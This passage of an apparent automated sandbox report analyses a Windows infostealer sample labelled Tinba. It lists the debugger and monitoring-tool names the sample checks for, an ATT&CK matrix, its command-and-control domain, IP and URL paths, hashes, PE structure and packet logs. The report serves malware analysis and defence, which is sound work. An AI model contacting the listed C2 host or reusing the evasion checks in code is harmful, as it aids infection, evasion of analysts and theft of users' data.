Source: JbN2WYseAr.exe, 00000000.00000003.1318965074.00000000016E1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\JbN2WYseAr.exeSystem information queried: ModuleInformationJump to behavior
Source: C:\Users\user\Desktop\JbN2WYseAr.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\JbN2WYseAr.exeThread information set: HideFromDebuggerJump to behavior
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\Desktop\JbN2WYseAr.exeOpen window title or class name: regmonclass
Source: C:\Users\user\Desktop\JbN2WYseAr.exeOpen window title or class name: gbdyllo
Source: C:\Users\user\Desktop\JbN2WYseAr.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\JbN2WYseAr.exeOpen window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\JbN2WYseAr.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\JbN2WYseAr.exeOpen window title or class name: ollydbg
Source: C:\Users\user\Desktop\JbN2WYseAr.exeOpen window title or class name: filemonclass
Source: C:\Users\user\Desktop\JbN2WYseAr.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\JbN2WYseAr.exeFile opened: NTICE
Source: C:\Users\user\Desktop\JbN2WYseAr.exeFile opened: SICE
Source: C:\Users\user\Desktop\JbN2WYseAr.exeFile opened: SIWVID
Source: C:\Users\user\Desktop\JbN2WYseAr.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\JbN2WYseAr.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\JbN2WYseAr.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\JbN2WYseAr.exeCode function: 0_2_00609980 rdtsc 0_2_00609980
Source: JbN2WYseAr.exe, JbN2WYseAr.exe, 00000000.00000002.1441549149.0000000000CC0000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
Source: C:\Users\user\Desktop\JbN2WYseAr.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\JbN2WYseAr.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\JbN2WYseAr.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\JbN2WYseAr.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\JbN2WYseAr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: JbN2WYseAr.exe, 00000000.00000003.1302599417.0000000007467000.00000004.00001000.00020000.00000000.sdmp, JbN2WYseAr.exe, 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: procmon.exe
Source: JbN2WYseAr.exe, 00000000.00000003.1302599417.0000000007467000.00000004.00001000.00020000.00000000.sdmp, JbN2WYseAr.exe, 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: wireshark.exe

Stealing of Sensitive Information

barindex
Infostealer behavior detected
Source: Signature ResultsSignatures: Mutex created, HTTP post and idle behavior
Leaks process information
Source: global trafficTCP traffic: 192.168.2.10:49719 -> 176.53.146.223:80

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Command and Scripting Interpreter		1
DLL Side-Loading		1
Process Injection		23
Virtualization/Sandbox Evasion		OS Credential Dumping751
Security Software Discovery		1
Exploitation of Remote Services		11
Archive Collected Data		11
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading		1
Process Injection		LSASS Memory23
Virtualization/Sandbox Evasion		Remote Desktop Protocol1
Data from Local System		4
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Deobfuscate/Decode Files or Information		Security Account Manager13
Process Discovery		SMB/Windows Admin SharesData from Network Shared Drive4
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
Obfuscated Files or Information		NTDS1
Remote System Discovery		Distributed Component Object ModelInput Capture5
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
Software Packing		LSA Secrets1
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain Credentials216
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
JbN2WYseAr.exe61%ReversingLabsWin32.Infostealer.Tinba
JbN2WYseAr.exe56%VirustotalBrowse
JbN2WYseAr.exe100%AviraTR/Crypt.TPM.Gen
JbN2WYseAr.exe100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk1735537737?argument=00%Avira URL Cloudsafe
http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk17355377374fd40%Avira URL Cloudsafe
http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk1735537737http://home.fiveth5vs.top/KhxTILlSHLygUudVWl0%Avira URL Cloudsafe
http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk170%Avira URL Cloudsafe
http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk17355377370%Avira URL Cloudsafe
http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk1735537737lse0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
home.fiveth5vs.top
176.53.146.223
truefalse
    		high
    httpbin.org
    		34.200.57.114
    		truefalse
      		high

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk1735537737?argument=0true
      • Avira URL Cloud: safe
      		unknown
      http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk1735537737true
      • Avira URL Cloud: safe
      		unknown
      https://httpbin.org/ipfalse
        		high

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        https://curl.se/docs/hsts.htmlJbN2WYseAr.exe, 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmpfalse
          		high
          http://html4/loose.dtdJbN2WYseAr.exe, 00000000.00000003.1302599417.0000000007467000.00000004.00001000.00020000.00000000.sdmp, JbN2WYseAr.exe, 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmpfalse
            		high
            https://httpbin.org/ipbeforeJbN2WYseAr.exe, 00000000.00000003.1302599417.0000000007467000.00000004.00001000.00020000.00000000.sdmp, JbN2WYseAr.exe, 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmpfalse
              		high
              https://curl.se/docs/http-cookies.htmlJbN2WYseAr.exe, JbN2WYseAr.exe, 00000000.00000003.1302599417.0000000007467000.00000004.00001000.00020000.00000000.sdmp, JbN2WYseAr.exe, 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmpfalse
                		high
                http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk1735537737http://home.fiveth5vs.top/KhxTILlSHLygUudVWlJbN2WYseAr.exe, 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://curl.se/docs/hsts.html#JbN2WYseAr.exefalse
                  		high
                  http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk17JbN2WYseAr.exe, 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk17355377374fd4JbN2WYseAr.exe, 00000000.00000003.1420555421.00000000016F6000.00000004.00000020.00020000.00000000.sdmp, JbN2WYseAr.exe, 00000000.00000003.1420841859.00000000016F6000.00000004.00000020.00020000.00000000.sdmp, JbN2WYseAr.exe, 00000000.00000002.1442340740.00000000016F6000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://curl.se/docs/alt-svc.htmlJbN2WYseAr.exe, 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmpfalse
                    		high
                    http://.cssJbN2WYseAr.exe, 00000000.00000003.1302599417.0000000007467000.00000004.00001000.00020000.00000000.sdmp, JbN2WYseAr.exe, 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmpfalse
                      		high
                      http://.jpgJbN2WYseAr.exe, 00000000.00000003.1302599417.0000000007467000.00000004.00001000.00020000.00000000.sdmp, JbN2WYseAr.exe, 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmpfalse
                        		high
                        http://home.fiveth5vs.top/KhxTILlSHLygUudVWlQk1735537737lseJbN2WYseAr.exe, 00000000.00000003.1420555421.00000000016F6000.00000004.00000020.00020000.00000000.sdmp, JbN2WYseAr.exe, 00000000.00000003.1420841859.00000000016F6000.00000004.00000020.00020000.00000000.sdmp, JbN2WYseAr.exe, 00000000.00000002.1442340740.00000000016F6000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown

                        World Map of Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public IPs

                        IPDomainCountryFlagASNASN NameMalicious
                        176.53.146.223
                        		home.fiveth5vs.topUnited Kingdom
                        		35791VANNINVENTURESGBfalse
                        34.200.57.114
                        		httpbin.orgUnited States
                        		14618AMAZON-AESUSfalse

                        General Information

                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1582704
                        Start date and time:2024-12-31 09:50:10 +01:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 4m 56s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:5
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:JbN2WYseAr.exe
                        renamed because original name is a hash value
                        Original Sample Name:3168cdb0691e91fc0109d3d5e854b7b1.exe
                        Detection:MAL
                        Classification:mal100.troj.spyw.evad.winEXE@1/0@8/2
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:Failed
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Stop behavior analysis, all processes terminated

                        Warnings

                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                        • Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.175.87.197
                        • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                        • Not all processes where analyzed, report is missing behavior information
                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                        Simulations

                        Behavior and APIs

                        No simulations

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        176.53.146.223ivHDHq51Ar.exeGet hashmaliciousUnknownBrowse
                        • home.fiveth5vs.top/KhxTILlSHLygUudVWlQk1735537737
                        34.200.57.114r8nllkNEQX.exeGet hashmaliciousUnknownBrowse
                          ivHDHq51Ar.exeGet hashmaliciousUnknownBrowse

                            Domains

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            home.fiveth5vs.topivHDHq51Ar.exeGet hashmaliciousUnknownBrowse
                            • 176.53.146.223
                            httpbin.orgr8nllkNEQX.exeGet hashmaliciousUnknownBrowse
                            • 34.200.57.114
                            yqUQPPp0LM.exeGet hashmaliciousUnknownBrowse
                            • 34.197.122.172
                            ivHDHq51Ar.exeGet hashmaliciousUnknownBrowse
                            • 34.200.57.114
                            ZN34wF8WI2.exeGet hashmaliciousUnknownBrowse
                            • 34.197.122.172
                            Hqle5OSmLQ.exeGet hashmaliciousUnknownBrowse
                            • 34.197.122.172
                            Set-up.exeGet hashmaliciousUnknownBrowse
                            • 52.202.253.164
                            Set-up.exeGet hashmaliciousUnknownBrowse
                            • 34.197.122.172
                            Set-up.exeGet hashmaliciousUnknownBrowse
                            • 52.73.63.247
                            a2mNMrPxow.exeGet hashmaliciousUnknownBrowse
                            • 3.218.7.103
                            SgMuuLxOCJ.exeGet hashmaliciousLummaCBrowse
                            • 34.226.108.155

                            ASNs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            VANNINVENTURESGBivHDHq51Ar.exeGet hashmaliciousUnknownBrowse
                            • 176.53.146.223
                            file.exeGet hashmaliciousScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, VidarBrowse
                            • 176.53.146.212
                            Tii6ue74NB.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, Stealc, VidarBrowse
                            • 176.53.146.212
                            file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYSBrowse
                            • 176.53.146.212
                            s3hvuz3XS0.exeGet hashmaliciousCryptbotBrowse
                            • 176.53.146.212
                            65AcuGF7W7.exeGet hashmaliciousCryptbotBrowse
                            • 176.53.146.212
                            9nYVfFos77.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                            • 176.53.146.212
                            ovQrwYAhbq.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                            • 176.53.146.212
                            Sh2uIqqKqc.exeGet hashmaliciousCryptbotBrowse
                            • 176.53.146.212
                            W6seF0MjGW.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                            • 176.53.146.212
                            AMAZON-AESUSr8nllkNEQX.exeGet hashmaliciousUnknownBrowse
                            • 34.200.57.114
                            yqUQPPp0LM.exeGet hashmaliciousUnknownBrowse
                            • 34.197.122.172
                            ivHDHq51Ar.exeGet hashmaliciousUnknownBrowse
                            • 34.200.57.114
                            ZN34wF8WI2.exeGet hashmaliciousUnknownBrowse
                            • 34.197.122.172
                            Hqle5OSmLQ.exeGet hashmaliciousUnknownBrowse
                            • 34.197.122.172
                            PO_2024_056209_MQ04865_ENQ_1045.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                            • 44.221.84.105
                            http://ghostbin.cafe24.com/Get hashmaliciousUnknownBrowse
                            • 44.199.56.69
                            Set-up.exeGet hashmaliciousUnknownBrowse
                            • 52.202.253.164
                            kwari.mips.elfGet hashmaliciousUnknownBrowse
                            • 54.226.65.111
                            Set-up.exeGet hashmaliciousUnknownBrowse
                            • 34.197.122.172

                            JA3 Fingerprints

                            No context

                            Dropped Files

                            No context

                            Created / dropped Files

                            No created / dropped files found

                            Static File Info

                            General

                            File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                            Entropy (8bit):7.982669469603556
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.96%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • VXD Driver (31/22) 0.00%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:JbN2WYseAr.exe
                            File size:4'512'256 bytes
                            MD5:3168cdb0691e91fc0109d3d5e854b7b1
                            SHA1:b29e09e7a8545b5471027b9b2a7e893e5266d727
                            SHA256:4ba12035398519562e56cf4b0a0a2e9dae54ec66ee9d54fc474d3e5fff8bef4f
                            SHA512:15c8d2c4c9098736edd486d5e0aa32f6e5011fb8655ed24980ada516f56812553d5025e4de67e401fcab92b0c15d883ccb9ccfe597440bd56aebdbdba4880f51
                            SSDEEP:98304:XzYulmALi/4srDBS0hL9RZL+VWYkBsF49:Xlk/4eBS0N9RZmloB
                            TLSH:E22633EAEF4338A2E52E82F2F0C7BC94313486A1C44DD568C5254AF73297799ED499F0
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5rg...............(..K...s..2............K...@...................................E...@... ............................

                            File Icon

                            Icon Hash:90cececece8e8eb0

                            Static PE Info

                            General

                            Entrypoint:0x1069000
                            Entrypoint Section:.taggant
                            Digitally signed:true
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                            DLL Characteristics:DYNAMIC_BASE
                            Time Stamp:0x677235C7 [Mon Dec 30 05:55:19 2024 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:4
                            OS Version Minor:0
                            File Version Major:4
                            File Version Minor:0
                            Subsystem Version Major:4
                            Subsystem Version Minor:0
                            Import Hash:2eabe9054cad5152567f0699947a2c5b

                            Authenticode Signature

                            Signature Valid:
                            Signature Issuer:
                            Signature Validation Error:
                            Error Number:
                            Not Before, Not After
                              Subject Chain
                                Version:
                                Thumbprint MD5:
                                Thumbprint SHA-1:
                                Thumbprint SHA-256:
                                Serial:

                                Entrypoint Preview

                                Instruction
                                jmp 00007F953D187D1Ah
                                popcnt eax, dword ptr [eax+eax+00h]
                                add byte ptr [eax], al
                                add cl, ch
                                add byte ptr [eax], ah
                                add byte ptr [eax], al
                                add byte ptr [esi], al
                                or al, byte ptr [eax]
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], dh
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                or byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [esi], al
                                or al, byte ptr [eax]
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [ecx], al
                                add byte ptr [eax], 00000000h
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                adc byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add cl, byte ptr [edx]
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al

                                Data Directories

                                NameVirtual AddressVirtual Size Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IMPORT0x70505f0x73.idata
                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x7040000x1ac.rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                IMAGE_DIRECTORY_ENTRY_SECURITY0x7308000x688
                                IMAGE_DIRECTORY_ENTRY_BASERELOC0xc671900x10ptayyfsq
                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                IMAGE_DIRECTORY_ENTRY_TLS0xc671400x18ptayyfsq
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                Sections

                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                0x10000x7030000x289a00fc490f20bd55eef8331a794b53e9a64cunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .rsrc0x7040000x1ac0x200a08f0a40a9819678b93e653ded2cdd8eFalse0.580078125data4.582504410327368IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .idata 0x7050000x10000x2000ff3b278c147647c2093aaa19ab35725False0.166015625data1.1569718486953509IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                0x7060000x3a10000x200720320e89981314a5c02c8618741b17funknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                ptayyfsq0xaa70000x1c10000x1c04008ee07286b55721071feb20900eac8162False0.9943666559188511data7.95564888988546IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                htlvnmme0xc680000x10000x40048593edd913403109fa2749590572e3cFalse0.7900390625data6.1596644462510595IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .taggant0xc690000x30000x2200bfae1b9be9ff784303962903db9b97cfFalse0.07628676470588236DOS executable (COM)0.7628984701205439IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                Resources

                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                RT_MANIFEST0xc671a00x152ASCII text, with CRLF line terminators0.6479289940828402

                                Imports

                                DLLImport
                                kernel32.dlllstrcpy

                                Network Behavior

                                Network Port Distribution

                                TCP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Dec 31, 2024 09:51:10.119735956 CET49703443192.168.2.1034.200.57.114
                                Dec 31, 2024 09:51:10.119786024 CET4434970334.200.57.114192.168.2.10
                                Dec 31, 2024 09:51:10.119853020 CET49703443192.168.2.1034.200.57.114
                                Dec 31, 2024 09:51:10.132515907 CET49703443192.168.2.1034.200.57.114
                                Dec 31, 2024 09:51:10.132543087 CET4434970334.200.57.114192.168.2.10
                                Dec 31, 2024 09:51:10.796798944 CET4434970334.200.57.114192.168.2.10
                                Dec 31, 2024 09:51:10.797283888 CET49703443192.168.2.1034.200.57.114
                                Dec 31, 2024 09:51:10.797314882 CET4434970334.200.57.114192.168.2.10
                                Dec 31, 2024 09:51:10.798506021 CET4434970334.200.57.114192.168.2.10
                                Dec 31, 2024 09:51:10.798563957 CET49703443192.168.2.1034.200.57.114
                                Dec 31, 2024 09:51:10.800123930 CET49703443192.168.2.1034.200.57.114
                                Dec 31, 2024 09:51:10.800189972 CET4434970334.200.57.114192.168.2.10
                                Dec 31, 2024 09:51:10.812894106 CET49703443192.168.2.1034.200.57.114
                                Dec 31, 2024 09:51:10.812915087 CET4434970334.200.57.114192.168.2.10
                                Dec 31, 2024 09:51:10.862396955 CET49703443192.168.2.1034.200.57.114
                                Dec 31, 2024 09:51:10.916049957 CET4434970334.200.57.114192.168.2.10
                                Dec 31, 2024 09:51:10.916157007 CET4434970334.200.57.114192.168.2.10
                                Dec 31, 2024 09:51:10.916281939 CET49703443192.168.2.1034.200.57.114
                                Dec 31, 2024 09:51:11.007968903 CET49703443192.168.2.1034.200.57.114
                                Dec 31, 2024 09:51:11.008012056 CET4434970334.200.57.114192.168.2.10
                                Dec 31, 2024 09:51:13.264802933 CET4971980192.168.2.10176.53.146.223
                                Dec 31, 2024 09:51:13.269551039 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.269615889 CET4971980192.168.2.10176.53.146.223
                                Dec 31, 2024 09:51:13.272392035 CET4971980192.168.2.10176.53.146.223
                                Dec 31, 2024 09:51:13.277260065 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.277271032 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.277328014 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.277328968 CET4971980192.168.2.10176.53.146.223
                                Dec 31, 2024 09:51:13.277337074 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.277369976 CET4971980192.168.2.10176.53.146.223
                                Dec 31, 2024 09:51:13.277395964 CET4971980192.168.2.10176.53.146.223
                                Dec 31, 2024 09:51:13.277412891 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.277422905 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.277456045 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.277467012 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.277470112 CET4971980192.168.2.10176.53.146.223
                                Dec 31, 2024 09:51:13.277483940 CET4971980192.168.2.10176.53.146.223
                                Dec 31, 2024 09:51:13.277501106 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.277509928 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.277524948 CET4971980192.168.2.10176.53.146.223
                                Dec 31, 2024 09:51:13.277545929 CET4971980192.168.2.10176.53.146.223
                                Dec 31, 2024 09:51:13.277558088 CET4971980192.168.2.10176.53.146.223
                                Dec 31, 2024 09:51:13.282162905 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.282174110 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.282191992 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.282229900 CET4971980192.168.2.10176.53.146.223
                                Dec 31, 2024 09:51:13.282244921 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.282247066 CET4971980192.168.2.10176.53.146.223
                                Dec 31, 2024 09:51:13.282284021 CET4971980192.168.2.10176.53.146.223
                                Dec 31, 2024 09:51:13.282354116 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.282365084 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.282407999 CET4971980192.168.2.10176.53.146.223
                                Dec 31, 2024 09:51:13.286119938 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.286264896 CET4971980192.168.2.10176.53.146.223
                                Dec 31, 2024 09:51:13.330924988 CET8049719176.53.146.223192.168.2.10
                                Dec 31, 2024 09:51:13.331038952 CET4971980192.168.2.10176.53.146.223
